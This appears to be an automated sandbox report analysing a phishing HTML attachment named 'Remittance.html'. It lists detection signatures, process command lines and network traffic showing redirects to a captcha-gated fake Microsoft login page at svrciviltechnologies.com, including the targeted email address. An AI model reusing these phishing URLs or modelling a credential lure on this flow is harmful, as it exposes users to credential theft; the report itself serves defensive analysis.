Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance.html

Overview

General Information

Sample Name:Remittance.html
Analysis ID:756206
MD5:2e6a26923a22e7c63a143e11227d4161
SHA1:8f6857398dfe794b8853efc9e02d57b12a0b3da5
SHA256:6ff75a1daf291abf72a3be2bb5034b0b0002ed90f7ea9c40ea84b66151fdae7e
Infos:

Detection

Captcha Phish, HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Yara detected Captcha Phish
HTML document with suspicious name
JA3 SSL client fingerprint seen in connection with other malware
HTML body contains low number of good links
Invalid T&C link found
Suspicious form URL found
IP address seen in connection with other malware
No HTML title found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Remittance.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 6968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1812,i,8274798147493147586,16206874965015421851,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
73402.1.pages.csvJoeSecurity_CaptchaPhish_1Yara detected Captcha PhishJoe Security
    39468.7.pages.csvJoeSecurity_CaptchaPhish_1Yara detected Captcha PhishJoe Security
      94194.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpMatcher: Template: microsoft matched with high similarity
        Source: Yara matchFile source: 94194.8.pages.csv, type: HTML
        Source: Yara matchFile source: 73402.1.pages.csv, type: HTML
        Source: Yara matchFile source: 39468.7.pages.csv, type: HTML
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: Number of links: 0
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: Invalid link: Terms of use
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: Invalid link: Privacy & cookies
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: Form action: action.php
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: HTML title missing
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: No <meta name="author".. found
        Source: https://svrciviltechnologies.com/qr/main/main/main.phpHTTP Parser: No <meta name="copyright".. found
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: unknownHTTPS traffic detected: 51.210.156.152:443 -> 192.168.2.3:49802 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 51.210.156.152:443 -> 192.168.2.3:49801 version: TLS 1.2
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.102&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.102Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /qr/main?e=?Facilities@fsbwa.com HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /qr/main/?e=?Facilities@fsbwa.com HTTP/1.1Host: svrciviltechnologies.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /qr/main/main HTTP/1.1Host: svrciviltechnologies.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/ HTTP/1.1Host: svrciviltechnologies.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: https://svrciviltechnologies.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb&co=aHR0cHM6Ly9zdnJjaXZpbHRlY2hub2xvZ2llcy5jb206NDQz&hl=en&v=Km9gKuG06He-isPsP6saG8cn&size=normal&cb=ndxp9hxikqk HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=Km9gKuG06He-isPsP6saG8cn HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb&co=aHR0cHM6Ly9zdnJjaXZpbHRlY2hub2xvZ2llcy5jb206NDQz&hl=en&v=Km9gKuG06He-isPsP6saG8cn&size=normal&cb=ndxp9hxikqkAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/02/cropped-IMG-20200221-WA0039-removebg-preview-32x32.png HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AEkXODD1_BdB7nrMCvTq-x5W-ERRA2trmCU7z6q9Ohx3TZJQz8IBQZNXRTpXomJG04OVLjYiuJG6KMWK7dDdEZVH3HfVlu5Y1MRSCWqvoYZyOTZAJPJBgVTzY1izWleMWQ1DdNyNVyR64t3bez5sDMUahfW9fGzMqb09hVueeaIuKLbXoTcDUNKEKtPgqJx3qSMQ9726-FY5QGW7dHeOBTjK3VDzNLKONA&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09APvHZ3o1InIvjYBrpCRNQlY1kgn1CgWUnm3L6-j2Zij8X3RhIYkNUiytuwITU8x6ol_mJkV8-w8IrNK0qUdjuKg
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AEkXODD1_BdB7nrMCvTq-x5W-ERRA2trmCU7z6q9Ohx3TZJQz8IBQZNXRTpXomJG04OVLjYiuJG6KMWK7dDdEZVH3HfVlu5Y1MRSCWqvoYZyOTZAJPJBgVTzY1izWleMWQ1DdNyNVyR64t3bez5sDMUahfW9fGzMqb09hVueeaIuKLbXoTcDUNKEKtPgqJx3qSMQ9726-FY5QGW7dHeOBTjK3VDzNLKONA&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb&id=2 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09APvHZ3o1InIvjYBrpCRNQlY1kgn1CgWUnm3L6-j2Zij8X3RhIYkNUiytuwITU8x6ol_mJkV8-w8IrNK0qUdjuKg
        Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AEkXODDBsSDm1gZwjhI95pI5c4GaymKZ6r6Iw096p69astcTB3G4FXgfiittMYfFWq2EDjyd_PO35Xo8aQWy442eIPrtPQgRcERcH50_bB30vydG3nbQSKX-Ys3S96DPr2GptcX5QBPkLNhhGtPbu7tBPyA0sOZVjaV3W5rwHGPoNmQe61xiRIc3B4oq2HOuxGlnLHV9yMiv34I9yPlTP684ylRSb7h2wg&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLC1yQEIkrbJAQiitskBCMS2yQEIqZ3KAQiTocsBCIurzAEI+7vMAQjWvMwBCJjRzAE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09APvHZ3o1InIvjYBrpCRNQlY1kgn1CgWUnm3L6-j2Zij8X3RhIYkNUiytuwITU8x6ol_mJkV8-w8IrNK0qUdjuKg
        Source: global trafficHTTP traffic detected: GET /qr/main/main/css/bootstrap.min.css HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/css/style.css HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/arrow.JPG HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/ellipsis_white.svg HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.3.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
